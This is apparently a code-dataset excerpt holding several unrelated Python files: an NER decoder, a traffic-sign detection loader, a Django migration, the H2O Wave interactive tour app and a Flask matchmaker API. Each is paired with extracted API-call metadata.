return LinearCRFDecoder(encoder_size, len(self.vocabs['tag']), self.secondary_encoder, self.config.crf)
def build_metric(self, **kwargs):
return TransformerNamedEntityRecognizer.build_metric(self, **kwargs)
def input_is_flat(self, data) -> bool:
return TransformerNamedEntityRecognizer.input_is_flat(self, data)
def prediction_to_result(self, prediction: Dict[str, Any], batch: Dict[str, Any]) -> Union[List, Dict]:
return TransformerNamedEntityRecognizer.prediction_to_human(self, prediction, self.vocabs['tag'].idx_to_token,
batch)
| [
"elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.update_metrics",
"elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.prediction_to_human",
"elit.layers.crf.crf.CRF",
"elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.compute_loss",
"elit.components.... | [((1012, 1052), 'torch.nn.Linear', 'torch.nn.Linear', (['hidden_size', 'num_labels'], {}), '(hidden_size, num_labels)\n', (1027, 1052), False, 'import torch\n'), ((5437, 5448), 'elit.common.transform.VocabDict', 'VocabDict', ([], {}), '()\n', (5446, 5448), False, 'from elit.common.transform import VocabDict\n'), ((6947, 7053), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.compute_loss', 'TransformerNamedEntityRecognizer.compute_loss', (['self', 'criterion', 'output', "batch['tag_id']", "batch['mask']"], {}), "(self, criterion, output,\n batch['tag_id'], batch['mask'])\n", (6992, 7053), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((7384, 7479), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.decode_output', 'TransformerNamedEntityRecognizer.decode_output', (['self', 'output', "batch['mask']", 'batch', 'decoder'], {}), "(self, output, batch['mask'],\n batch, decoder)\n", (7430, 7479), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((7783, 7908), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.update_metrics', 'TransformerNamedEntityRecognizer.update_metrics', (['self', 'metric', 'output', "batch['tag_id']", "batch['mask']", 'batch', 'prediction'], {}), "(self, metric, output, batch\n ['tag_id'], batch['mask'], batch, prediction)\n", (7830, 7908), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((8219, 8280), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.build_metric', 'TransformerNamedEntityRecognizer.build_metric', (['self'], {}), '(self, **kwargs)\n', (8264, 8280), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((8340, 8398), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.input_is_flat', 'TransformerNamedEntityRecognizer.input_is_flat', (['self', 'data'], {}), '(self, data)\n', (8386, 8398), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((8523, 8638), 'elit.components.ner.transformer_ner.TransformerNamedEntityRecognizer.prediction_to_human', 'TransformerNamedEntityRecognizer.prediction_to_human', (['self', 'prediction', "self.vocabs['tag'].idx_to_token", 'batch'], {}), "(self, prediction, self\n .vocabs['tag'].idx_to_token, batch)\n", (8575, 8638), False, 'from elit.components.ner.transformer_ner import TransformerNamedEntityRecognizer\n'), ((1072, 1087), 'elit.layers.crf.crf.CRF', 'CRF', (['num_labels'], {}), '(num_labels)\n', (1075, 1087), False, 'from elit.layers.crf.crf import CRF\n')] |
import logging
import math
from datetime import datetime
from pathlib import Path
from typing import Set
from pandas import DataFrame
from shapely.geometry import Point
from shapely.strtree import STRtree
import utility
from model import Position
DEFAULT_CLASSES = {
'b11', 'c61', 'c51', 'c55:50',
'c55:60', 'c55:70', 'c56:60', 'c56:70',
'c62', 'd11.3', 'd15.2', 'd15.3',
'e23', 'e33.1', 'e55', 'e56',
'n42.2', 'n42.3'
}
DATA_PATH = Path(__file__).parents[1].joinpath('data')
AALBORG_DATA_PATH = DATA_PATH.joinpath('aalborg')
HP_TUNING_DATA_PATH = DATA_PATH.joinpath('hp_tuning')
logger = logging.getLogger(Path(__file__).stem)
def map_aal_data(position: Position):
time_format = '%Y-%m-%dT%H:%M:%S'
return {
'id': position.properties['object_no'],
'geom': Point(position),
'trip_id': position.properties['trip_no'],
'classifier': position.properties['label_name'],
'speed': position.properties['speed'],
'heading': math.radians(position.properties['obj_heading']),
'score': position.properties['score'],
'distance': position.properties['distance_to_object'],
'trip_start_time': datetime.strptime(position.properties['trip_start_time'], time_format),
'trip_stop_time': datetime.strptime(position.properties['trip_stop_time'], time_format),
'image_capture_time': datetime.strptime(position.properties['image_capture_time'], time_format)
}
def load_gomap_detections(filepath: str, classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame:
detections = utility.load_geoJson(filepath, 'epsg:4326', 'epsg:3044')
df = DataFrame(map(map_aal_data, detections))
logger.info('Loaded %d detections', len(df))
# Cleansing
df = df[df['classifier'].isin(classes)]
logger.info('%d detections remains after applying class filter', len(df))
logger.debug(df.groupby('classifier')['classifier'].agg('count'))
df = df[df['score'] >= min_score]
logger.info('%d detections remains after applying min_score >= %f filter', len(df), min_score)
df = df[df['distance'] <= max_distance]
logger.info('%d detections remains after applying max_distance <= %f meter filter', len(df), max_distance)
logger.debug(df.groupby('classifier')['classifier'].agg('count'))
return df
def load_aal_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(AALBORG_DATA_PATH.joinpath('traffic_sign_detections.geojson'), classes, min_score, max_distance)
def load_gomap_train_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(HP_TUNING_DATA_PATH.joinpath('training.geojson'), classes, min_score, max_distance)
def load_gomap_validation_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(HP_TUNING_DATA_PATH.joinpath('validation.geojson'), classes, min_score, max_distance)
def load_gomap_test_detections(classes: Set[str] = DEFAULT_CLASSES, min_score=0.8, max_distance=30) -> DataFrame :
return load_gomap_detections(HP_TUNING_DATA_PATH.joinpath('testing.geojson'), classes, min_score, max_distance)
def _map_aal_truth(position: Position):
position.properties['heading'] = math.radians(position.properties['map_heading'])
return position
def load_gomap_truths(filepath: str, classes: Set[str] = DEFAULT_CLASSES) -> STRtree:
def normalize_label_name(position: Position) -> Position:
label = position.properties['label_name']
if label in {'c55', 'c56'}:
position.properties['label_name'] = f'{label}:{position.properties["sign_text"]}'
return position
truths = utility.load_geoJson(filepath, 'epsg:4326', 'epsg:3044')
truths = list(truths)
logger.info('Loaded %d truths', len(truths))
truths = map(normalize_label_name, truths)
truths = [x for x in truths if x.properties['label_name'] in classes]
logger.info('%d truths remains after applying class filter', len(truths))
truths = map(_map_aal_truth, truths)
return STRtree(truths)
def load_aal_truths(classes: Set[str] = DEFAULT_CLASSES) -> STRtree:
return load_gomap_truths(AALBORG_DATA_PATH.joinpath('traffic_sign_ground_truth.geojson'), classes)
def load_gomap_test_truths(classes: Set[str] = DEFAULT_CLASSES) -> STRtree:
return load_gomap_truths(HP_TUNING_DATA_PATH.joinpath('testing_truth.geojson'), classes)
| [
"pathlib.Path",
"datetime.datetime.strptime",
"shapely.strtree.STRtree",
"shapely.geometry.Point",
"utility.load_geoJson",
"math.radians"
] | [((1720, 1776), 'utility.load_geoJson', 'utility.load_geoJson', (['filepath', '"""epsg:4326"""', '"""epsg:3044"""'], {}), "(filepath, 'epsg:4326', 'epsg:3044')\n", (1740, 1776), False, 'import utility\n'), ((3527, 3575), 'math.radians', 'math.radians', (["position.properties['map_heading']"], {}), "(position.properties['map_heading'])\n", (3539, 3575), False, 'import math\n'), ((3975, 4031), 'utility.load_geoJson', 'utility.load_geoJson', (['filepath', '"""epsg:4326"""', '"""epsg:3044"""'], {}), "(filepath, 'epsg:4326', 'epsg:3044')\n", (3995, 4031), False, 'import utility\n'), ((4371, 4386), 'shapely.strtree.STRtree', 'STRtree', (['truths'], {}), '(truths)\n', (4378, 4386), False, 'from shapely.strtree import STRtree\n'), ((677, 691), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (681, 691), False, 'from pathlib import Path\n'), ((866, 881), 'shapely.geometry.Point', 'Point', (['position'], {}), '(position)\n', (871, 881), False, 'from shapely.geometry import Point\n'), ((1077, 1125), 'math.radians', 'math.radians', (["position.properties['obj_heading']"], {}), "(position.properties['obj_heading'])\n", (1089, 1125), False, 'import math\n'), ((1279, 1349), 'datetime.datetime.strptime', 'datetime.strptime', (["position.properties['trip_start_time']", 'time_format'], {}), "(position.properties['trip_start_time'], time_format)\n", (1296, 1349), False, 'from datetime import datetime\n'), ((1382, 1451), 'datetime.datetime.strptime', 'datetime.strptime', (["position.properties['trip_stop_time']", 'time_format'], {}), "(position.properties['trip_stop_time'], time_format)\n", (1399, 1451), False, 'from datetime import datetime\n'), ((1488, 1561), 'datetime.datetime.strptime', 'datetime.strptime', (["position.properties['image_capture_time']", 'time_format'], {}), "(position.properties['image_capture_time'], time_format)\n", (1505, 1561), False, 'from datetime import datetime\n'), ((498, 512), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (502, 512), False, 'from pathlib import Path\n')] |
# Generated by Django 3.0.2 on 2020-01-24 02:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('restaurantes', '0009_auto_20200123_2310'),
]
operations = [
migrations.RemoveField(
model_name='enderecos',
name='restaurante',
),
migrations.AddField(
model_name='restaurantes',
name='enderecos',
field=models.ForeignKey(blank=True, default=1, on_delete=django.db.models.deletion.DO_NOTHING, to='restaurantes.Enderecos'),
preserve_default=False,
),
]
| [
"django.db.migrations.RemoveField",
"django.db.models.ForeignKey"
] | [((273, 339), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""enderecos"""', 'name': '"""restaurante"""'}), "(model_name='enderecos', name='restaurante')\n", (295, 339), False, 'from django.db import migrations, models\n'), ((492, 614), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'default': '(1)', 'on_delete': 'django.db.models.deletion.DO_NOTHING', 'to': '"""restaurantes.Enderecos"""'}), "(blank=True, default=1, on_delete=django.db.models.\n deletion.DO_NOTHING, to='restaurantes.Enderecos')\n", (509, 614), False, 'from django.db import migrations, models\n')] |
import collections
import os
import os.path
import re
import subprocess
import sys
from urllib.parse import urlparse
from typing import List, Optional, Dict, Tuple
from pygments import highlight
from pygments.formatters.html import HtmlFormatter
from pygments.lexers import get_lexer_by_name
from h2o_wave import main, app, Q, ui
py_lexer = get_lexer_by_name('python')
html_formatter = HtmlFormatter(full=True, style='xcode')
example_dir = os.path.dirname(os.path.realpath(__file__))
_base_url = os.environ.get('H2O_WAVE_BASE_URL', '/')
_app_address = urlparse(os.environ.get(f'H2O_WAVE_APP_ADDRESS', 'http://127.0.0.1:8000'))
_app_host, _app_port = _app_address.hostname, '10102'
default_example_name = 'hello_world'
class Example:
def __init__(self, filename: str, title: str, description: str, source: str):
self.name = os.path.splitext(filename)[0]
self.filename = filename
self.title = title
self.description = description
self.source = source
self.code = highlight(source, py_lexer, html_formatter)
self.previous_example: Optional[Example] = None
self.next_example: Optional[Example] = None
self.process: Optional[subprocess.Popen] = None
self.is_app = source.find('@app(') > 0
async def start(self):
env = dict(H2O_WAVE_BASE_URL=_base_url)
# The environment passed into Popen must include SYSTEMROOT, otherwise Popen will fail when called
# inside python during initialization if %PATH% is configured, but without %SYSTEMROOT%.
if sys.platform.lower().startswith('win'):
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
if self.is_app:
self.process = subprocess.Popen([
sys.executable, '-m', 'uvicorn',
'--host', '0.0.0.0',
'--port', _app_port,
f'examples.{self.name}:main',
], env=dict(H2O_WAVE_EXTERNAL_ADDRESS=f'http://{_app_host}:{_app_port}', PATH=os.environ['PATH'], **env))
else:
self.process = subprocess.Popen([sys.executable, os.path.join(example_dir, self.filename)], env=env)
async def stop(self):
if self.process and self.process.returncode is None:
self.process.terminate()
self.process.wait()
active_example: Optional[Example] = None
def read_lines(p: str) -> List[str]:
with open(p, encoding='utf-8') as f:
return f.readlines()
def read_file(p: str) -> str:
with open(p, encoding='utf-8') as f:
return f.read()
def strip_comment(line: str) -> str:
"""Returns the content of a line without '#' and ' ' characters
remove leading '#', but preserve '#' that is part of a tag
example:
>>> '# #hello '.strip('#').strip()
'#hello'
"""
return line.strip('#').strip()
def parse_tags(description: str) -> Tuple[str, List[str]]:
"""Creates tags from description.
Accepts a description containing tags and returns a (new_description, tags) tuple.
The convention for tags:
1. Any valid twitter hashtag
For example, accept a description in any of the following forms
1. Use a checklist to group a set of related checkboxes. #form #checkbox #checklist
2. Use a checklist to group a set of related checkboxes.
#form #checkbox #checklist
3. Use a #checklist to group a set of related checkboxes.
#form #checkbox
and return
('Use a checklist to group a set of related checkboxes.', ['checkbox', 'checklist', 'form']). The list of tags will
be sorted and all tags will be converted to lowercase.
Args:
description: Complete description of an example.
Returns:
A tuple of new_description and a sorted list of tags. new_description is created by removing the '#' characters
from the description.
"""
hashtag_regex_pattern = r"(\s+)#(\w*[a-zA-Z]+\w*)\b"
pattern = re.compile(hashtag_regex_pattern)
matches = pattern.findall(' ' + description)
# Retrieve tags from the matches
tags = sorted(list(set([x[-1].lower() for x in matches])))
# Remove the '#' before the tags in description
new_d = pattern.sub(r'\1\2', ' ' + description)
# Remove the last line in description if it has only tags
*lines, last_line = new_d.strip().splitlines()
last_line_has_tags_only = len(last_line.strip()) > 1 and all([x.strip().lower() in tags for x in last_line.split()])
if last_line_has_tags_only:
# Return all lines except the last line
return '\n'.join(lines), tags
# Remove the last sentence if it has only tags
*sentences, last_sentence = last_line.split('. ')
last_sentence_has_tags_only = len(last_sentence.strip()) > 1 and all(
[x.strip().lower() in tags for x in last_sentence.split()])
if last_sentence_has_tags_only:
# Return all lines and all sentences in the last line except the last sentence
lines.extend(sentences)
return '\n'.join(lines) + '.', tags
# Return the complete description
lines.append(last_line)
return '\n'.join(lines), tags
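# Added for clarity (not part of the original tour script): a minimal, hypothetical
# self-check of parse_tags, reusing the checklist example from its docstring.
def _demo_parse_tags() -> None:
    text, tags = parse_tags('Use a checklist to group a set of related checkboxes. #form #checkbox')
    assert text == 'Use a checklist to group a set of related checkboxes.'
    assert tags == ['checkbox', 'form']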
def load_example(filename: str) -> Example:
contents = read_file(os.path.join(example_dir, filename))
parts = contents.split('---', maxsplit=1)
header, source = parts[0].strip().splitlines(), parts[1].strip()
title, description = strip_comment(header[0]), [strip_comment(x) for x in header[1:]]
new_description, _ = parse_tags('\n'.join(description))
return Example(filename, title, new_description, source)
def load_examples(filenames: List[str]) -> Dict[str, Example]:
examples = collections.OrderedDict()
for filename in filenames:
example = load_example(filename)
examples[example.name] = example
example_list = [e for e in examples.values()]
k = len(example_list) - 1
for i, e in enumerate(example_list):
if i > 0:
e.previous_example = example_list[i - 1]
if i < k:
e.next_example = example_list[i + 1]
return examples
app_title = 'H2O Wave Tour'
async def setup_page(q: Q):
q.page['meta'] = ui.meta_card(box='', title=app_title, layouts=[
ui.layout(breakpoint='xs', zones=[
ui.zone('header'),
ui.zone('blurb'),
ui.zone('main', size='calc(100vh - 140px)', direction=ui.ZoneDirection.ROW, zones=[
ui.zone('code'),
ui.zone('preview')
])
])
])
q.page['header'] = ui.header_card(
box='header',
title=app_title,
subtitle=f'{len(catalog)} Interactive Examples',
image='https://wave.h2o.ai/img/h2o-logo.svg',
items=[
ui.links(inline=True, items=[
ui.link(label='Wave docs', path='https://wave.h2o.ai/docs/getting-started', target='_blank'),
ui.link(label='Discussions', path='https://github.com/h2oai/wave/discussions', target='_blank'),
ui.link(label='Blog', path='https://wave.h2o.ai/blog', target='_blank'),
ui.link(label='Hybrid Cloud', path='https://www.h2o.ai/hybrid-cloud/', target='_blank'),
ui.link(label='H2O', path='https://www.h2o.ai/', target='_blank'),
])
]
)
q.page['blurb'] = ui.section_card(box='blurb', title='', subtitle='', items=[])
q.page['code'] = ui.frame_card(box='code', title='', content='')
q.page['preview'] = ui.frame_card(box='preview', title='Preview', path=f'{_base_url}demo')
await q.page.save()
def make_blurb(q: Q, example: Example):
blurb_card = q.page['blurb']
blurb_card.title = example.title
blurb_card.subtitle = example.description
# HACK: Recreate dropdown every time (by dynamic name) to control value (needed for next / prev btn functionality).
items = [ui.dropdown(name=q.args['#'] or default_example_name, width='300px', value=example.name, trigger=True,
choices=[ui.choice(name=e.name, label=e.title) for e in catalog.values()])]
if example.previous_example:
items.append(ui.button(name=f'#{example.previous_example.name}', label='Previous'))
if example.next_example:
items.append(ui.button(name=f'#{example.next_example.name}', label='Next', primary=True))
blurb_card.items = items
async def show_example(q: Q, example: Example):
# Clear demo page
demo_page = q.site['/demo']
demo_page.drop()
await demo_page.save()
# Stop active example, if any.
global active_example
if active_example:
await active_example.stop()
# Start new example
active_example = example
await active_example.start()
# Update example blurb
make_blurb(q, active_example)
# Update code display
code_card = q.page['code']
code_card.title = active_example.filename
code_card.content = active_example.code
preview_card = q.page['preview']
# Update preview title
preview_card.title = f'Preview of {active_example.filename}'
# HACK
# The ?e= appended to the path forces the frame to reload.
# The url param is not actually used.
preview_card.path = f'{_base_url}demo?e={active_example.name}'
await q.page.save()
@app('/tour')
async def serve(q: Q):
if not q.client.initialized:
q.client.initialized = True
await setup_page(q)
search = q.args[q.args['#'] or default_example_name]
if search:
q.page['meta'] = ui.meta_card(box='', redirect=f'#{search}')
await show_example(q, catalog[search or q.args['#'] or default_example_name])
example_filenames = [line.strip() for line in read_lines(os.path.join(example_dir, 'tour.conf')) if
not line.strip().startswith('#')]
catalog = load_examples(example_filenames)
print('----------------------------------------')
print(' Welcome to the H2O Wave Interactive Tour!')
print('')
print(' Go to http://localhost:10101/tour')
print('----------------------------------------')
| [
"collections.OrderedDict",
"re.compile",
"pygments.highlight",
"h2o_wave.ui.meta_card",
"os.environ.get",
"h2o_wave.ui.section_card",
"os.path.join",
"h2o_wave.ui.frame_card",
"os.path.realpath",
"os.path.splitext",
"h2o_wave.ui.button",
"h2o_wave.app",
"h2o_wave.ui.choice",
"pygments.lexe... | [((344, 371), 'pygments.lexers.get_lexer_by_name', 'get_lexer_by_name', (['"""python"""'], {}), "('python')\n", (361, 371), False, 'from pygments.lexers import get_lexer_by_name\n'), ((389, 428), 'pygments.formatters.html.HtmlFormatter', 'HtmlFormatter', ([], {'full': '(True)', 'style': '"""xcode"""'}), "(full=True, style='xcode')\n", (402, 428), False, 'from pygments.formatters.html import HtmlFormatter\n'), ((500, 540), 'os.environ.get', 'os.environ.get', (['"""H2O_WAVE_BASE_URL"""', '"""/"""'], {}), "('H2O_WAVE_BASE_URL', '/')\n", (514, 540), False, 'import os\n'), ((9225, 9237), 'h2o_wave.app', 'app', (['"""/tour"""'], {}), "('/tour')\n", (9228, 9237), False, 'from h2o_wave import main, app, Q, ui\n'), ((459, 485), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (475, 485), False, 'import os\n'), ((565, 629), 'os.environ.get', 'os.environ.get', (['f"""H2O_WAVE_APP_ADDRESS"""', '"""http://127.0.0.1:8000"""'], {}), "(f'H2O_WAVE_APP_ADDRESS', 'http://127.0.0.1:8000')\n", (579, 629), False, 'import os\n'), ((3926, 3959), 're.compile', 're.compile', (['hashtag_regex_pattern'], {}), '(hashtag_regex_pattern)\n', (3936, 3959), False, 'import re\n'), ((5630, 5655), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (5653, 5655), False, 'import collections\n'), ((7287, 7348), 'h2o_wave.ui.section_card', 'ui.section_card', ([], {'box': '"""blurb"""', 'title': '""""""', 'subtitle': '""""""', 'items': '[]'}), "(box='blurb', title='', subtitle='', items=[])\n", (7302, 7348), False, 'from h2o_wave import main, app, Q, ui\n'), ((7370, 7417), 'h2o_wave.ui.frame_card', 'ui.frame_card', ([], {'box': '"""code"""', 'title': '""""""', 'content': '""""""'}), "(box='code', title='', content='')\n", (7383, 7417), False, 'from h2o_wave import main, app, Q, ui\n'), ((7442, 7512), 'h2o_wave.ui.frame_card', 'ui.frame_card', ([], {'box': '"""preview"""', 'title': '"""Preview"""', 'path': 'f"""{_base_url}demo"""'}), "(box='preview', title='Preview', path=f'{_base_url}demo')\n", (7455, 7512), False, 'from h2o_wave import main, app, Q, ui\n'), ((1019, 1062), 'pygments.highlight', 'highlight', (['source', 'py_lexer', 'html_formatter'], {}), '(source, py_lexer, html_formatter)\n', (1028, 1062), False, 'from pygments import highlight\n'), ((5187, 5222), 'os.path.join', 'os.path.join', (['example_dir', 'filename'], {}), '(example_dir, filename)\n', (5199, 5222), False, 'import os\n'), ((9456, 9499), 'h2o_wave.ui.meta_card', 'ui.meta_card', ([], {'box': '""""""', 'redirect': 'f"""#{search}"""'}), "(box='', redirect=f'#{search}')\n", (9468, 9499), False, 'from h2o_wave import main, app, Q, ui\n'), ((841, 867), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (857, 867), False, 'import os\n'), ((8087, 8156), 'h2o_wave.ui.button', 'ui.button', ([], {'name': 'f"""#{example.previous_example.name}"""', 'label': '"""Previous"""'}), "(name=f'#{example.previous_example.name}', label='Previous')\n", (8096, 8156), False, 'from h2o_wave import main, app, Q, ui\n'), ((8208, 8283), 'h2o_wave.ui.button', 'ui.button', ([], {'name': 'f"""#{example.next_example.name}"""', 'label': '"""Next"""', 'primary': '(True)'}), "(name=f'#{example.next_example.name}', label='Next', primary=True)\n", (8217, 8283), False, 'from h2o_wave import main, app, Q, ui\n'), ((9642, 9680), 'os.path.join', 'os.path.join', (['example_dir', '"""tour.conf"""'], {}), "(example_dir, 'tour.conf')\n", (9654, 9680), False, 'import os\n'), ((1565, 1585), 'sys.platform.lower', 
'sys.platform.lower', ([], {}), '()\n', (1583, 1585), False, 'import sys\n'), ((2094, 2134), 'os.path.join', 'os.path.join', (['example_dir', 'self.filename'], {}), '(example_dir, self.filename)\n', (2106, 2134), False, 'import os\n'), ((7966, 8003), 'h2o_wave.ui.choice', 'ui.choice', ([], {'name': 'e.name', 'label': 'e.title'}), '(name=e.name, label=e.title)\n', (7975, 8003), False, 'from h2o_wave import main, app, Q, ui\n'), ((6232, 6249), 'h2o_wave.ui.zone', 'ui.zone', (['"""header"""'], {}), "('header')\n", (6239, 6249), False, 'from h2o_wave import main, app, Q, ui\n'), ((6263, 6279), 'h2o_wave.ui.zone', 'ui.zone', (['"""blurb"""'], {}), "('blurb')\n", (6270, 6279), False, 'from h2o_wave import main, app, Q, ui\n'), ((6750, 6846), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Wave docs"""', 'path': '"""https://wave.h2o.ai/docs/getting-started"""', 'target': '"""_blank"""'}), "(label='Wave docs', path='https://wave.h2o.ai/docs/getting-started',\n target='_blank')\n", (6757, 6846), False, 'from h2o_wave import main, app, Q, ui\n'), ((6860, 6960), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Discussions"""', 'path': '"""https://github.com/h2oai/wave/discussions"""', 'target': '"""_blank"""'}), "(label='Discussions', path=\n 'https://github.com/h2oai/wave/discussions', target='_blank')\n", (6867, 6960), False, 'from h2o_wave import main, app, Q, ui\n'), ((6973, 7044), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Blog"""', 'path': '"""https://wave.h2o.ai/blog"""', 'target': '"""_blank"""'}), "(label='Blog', path='https://wave.h2o.ai/blog', target='_blank')\n", (6980, 7044), False, 'from h2o_wave import main, app, Q, ui\n'), ((7062, 7153), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""Hybrid Cloud"""', 'path': '"""https://www.h2o.ai/hybrid-cloud/"""', 'target': '"""_blank"""'}), "(label='Hybrid Cloud', path='https://www.h2o.ai/hybrid-cloud/',\n target='_blank')\n", (7069, 7153), False, 'from h2o_wave import main, app, Q, ui\n'), ((7167, 7232), 'h2o_wave.ui.link', 'ui.link', ([], {'label': '"""H2O"""', 'path': '"""https://www.h2o.ai/"""', 'target': '"""_blank"""'}), "(label='H2O', path='https://www.h2o.ai/', target='_blank')\n", (7174, 7232), False, 'from h2o_wave import main, app, Q, ui\n'), ((6393, 6408), 'h2o_wave.ui.zone', 'ui.zone', (['"""code"""'], {}), "('code')\n", (6400, 6408), False, 'from h2o_wave import main, app, Q, ui\n'), ((6426, 6444), 'h2o_wave.ui.zone', 'ui.zone', (['"""preview"""'], {}), "('preview')\n", (6433, 6444), False, 'from h2o_wave import main, app, Q, ui\n')] |
from flask import request, jsonify, abort
from flask.ext.login import login_required, current_user
import bots
from matchmaker import app, db
import matches
import match_logs
import util
import profile
#
# Public API
#
@app.route('/api/matches')
@login_required
def open_matches():
open = matches.OpenMatches(db)
return util.paged_json(open.active(app.config))
@app.route('/api/matches/finished')
@login_required
def finished_matches():
offset = request.args.get('offset', type=int, default=0)
finished = matches.FinishedMatches(db, offset)
pagination, hits = finished.finished(current_user)
return util.paged_json(hits, pagination)
@app.route('/api/matches/<match_id>')
@login_required
def get_match_logs(match_id):
streamer = match_logs.MatchLogBuilder(match_id)
if not streamer.valid():
abort(404)
return jsonify(streamer.data())
@app.route('/api/bot/<guid_or_key>')
def get_bot(guid_or_key):
bot = bots.BotInfo(db, guid_or_key).bot
if not bot:
abort(404)
return jsonify({
"success": True,
"bot": bot,
})
@app.route('/api/bot/<name>', methods=['POST'])
@login_required
def new_bot(name):
creator = profile.BotMaker(current_user, name)
bot = creator.create(db)
return jsonify({
"success": True,
"bot": bot,
})
#
# Internal API
#
@app.route('/api/internal/new_match', methods=['POST'])
def new_match():
maker = matches.NewMatch()
maker.create(db)
return jsonify(**{
"key": maker.guid(),
"success": True,
})
@app.route('/api/internal/join/<game_key>', methods=['POST'])
def player_joined(game_key):
bot_key = request.args.get('key')
joiner = matches.MatchJoiner(game_key, bot_key)
code, message = joiner.join(db)
return jsonify(status=code, message=message), code
@app.route('/api/internal/finished/<game_key>', methods=['POST'])
def game_finished(game_key):
match_results = request.get_json(force=True)
if not match_results:
abort(404)
writer = matches.MatchResultsWriter(game_key)
if not writer.valid():
abort(404)
writer.record(db, match_results)
new_match = matches.MatchCreatorJob(db)
new_match.run()
return jsonify({"success": True})
| [
"flask.request.args.get",
"bots.BotInfo",
"matches.OpenMatches",
"profile.BotMaker",
"matches.MatchJoiner",
"flask.jsonify",
"matches.NewMatch",
"matches.MatchCreatorJob",
"match_logs.MatchLogBuilder",
"matches.MatchResultsWriter",
"flask.request.get_json",
"matchmaker.app.route",
"util.page... | [((225, 250), 'matchmaker.app.route', 'app.route', (['"""/api/matches"""'], {}), "('/api/matches')\n", (234, 250), False, 'from matchmaker import app, db\n'), ((377, 411), 'matchmaker.app.route', 'app.route', (['"""/api/matches/finished"""'], {}), "('/api/matches/finished')\n", (386, 411), False, 'from matchmaker import app, db\n'), ((667, 703), 'matchmaker.app.route', 'app.route', (['"""/api/matches/<match_id>"""'], {}), "('/api/matches/<match_id>')\n", (676, 703), False, 'from matchmaker import app, db\n'), ((889, 924), 'matchmaker.app.route', 'app.route', (['"""/api/bot/<guid_or_key>"""'], {}), "('/api/bot/<guid_or_key>')\n", (898, 924), False, 'from matchmaker import app, db\n'), ((1106, 1152), 'matchmaker.app.route', 'app.route', (['"""/api/bot/<name>"""'], {'methods': "['POST']"}), "('/api/bot/<name>', methods=['POST'])\n", (1115, 1152), False, 'from matchmaker import app, db\n'), ((1364, 1418), 'matchmaker.app.route', 'app.route', (['"""/api/internal/new_match"""'], {'methods': "['POST']"}), "('/api/internal/new_match', methods=['POST'])\n", (1373, 1418), False, 'from matchmaker import app, db\n'), ((1575, 1635), 'matchmaker.app.route', 'app.route', (['"""/api/internal/join/<game_key>"""'], {'methods': "['POST']"}), "('/api/internal/join/<game_key>', methods=['POST'])\n", (1584, 1635), False, 'from matchmaker import app, db\n'), ((1849, 1913), 'matchmaker.app.route', 'app.route', (['"""/api/internal/finished/<game_key>"""'], {'methods': "['POST']"}), "('/api/internal/finished/<game_key>', methods=['POST'])\n", (1858, 1913), False, 'from matchmaker import app, db\n'), ((298, 321), 'matches.OpenMatches', 'matches.OpenMatches', (['db'], {}), '(db)\n', (317, 321), False, 'import matches\n'), ((465, 512), 'flask.request.args.get', 'request.args.get', (['"""offset"""'], {'type': 'int', 'default': '(0)'}), "('offset', type=int, default=0)\n", (481, 512), False, 'from flask import request, jsonify, abort\n'), ((528, 563), 'matches.FinishedMatches', 'matches.FinishedMatches', (['db', 'offset'], {}), '(db, offset)\n', (551, 563), False, 'import matches\n'), ((630, 663), 'util.paged_json', 'util.paged_json', (['hits', 'pagination'], {}), '(hits, pagination)\n', (645, 663), False, 'import util\n'), ((765, 801), 'match_logs.MatchLogBuilder', 'match_logs.MatchLogBuilder', (['match_id'], {}), '(match_id)\n', (791, 801), False, 'import match_logs\n'), ((1041, 1079), 'flask.jsonify', 'jsonify', (["{'success': True, 'bot': bot}"], {}), "({'success': True, 'bot': bot})\n", (1048, 1079), False, 'from flask import request, jsonify, abort\n'), ((1202, 1238), 'profile.BotMaker', 'profile.BotMaker', (['current_user', 'name'], {}), '(current_user, name)\n', (1218, 1238), False, 'import profile\n'), ((1279, 1317), 'flask.jsonify', 'jsonify', (["{'success': True, 'bot': bot}"], {}), "({'success': True, 'bot': bot})\n", (1286, 1317), False, 'from flask import request, jsonify, abort\n'), ((1448, 1466), 'matches.NewMatch', 'matches.NewMatch', ([], {}), '()\n', (1464, 1466), False, 'import matches\n'), ((1679, 1702), 'flask.request.args.get', 'request.args.get', (['"""key"""'], {}), "('key')\n", (1695, 1702), False, 'from flask import request, jsonify, abort\n'), ((1716, 1754), 'matches.MatchJoiner', 'matches.MatchJoiner', (['game_key', 'bot_key'], {}), '(game_key, bot_key)\n', (1735, 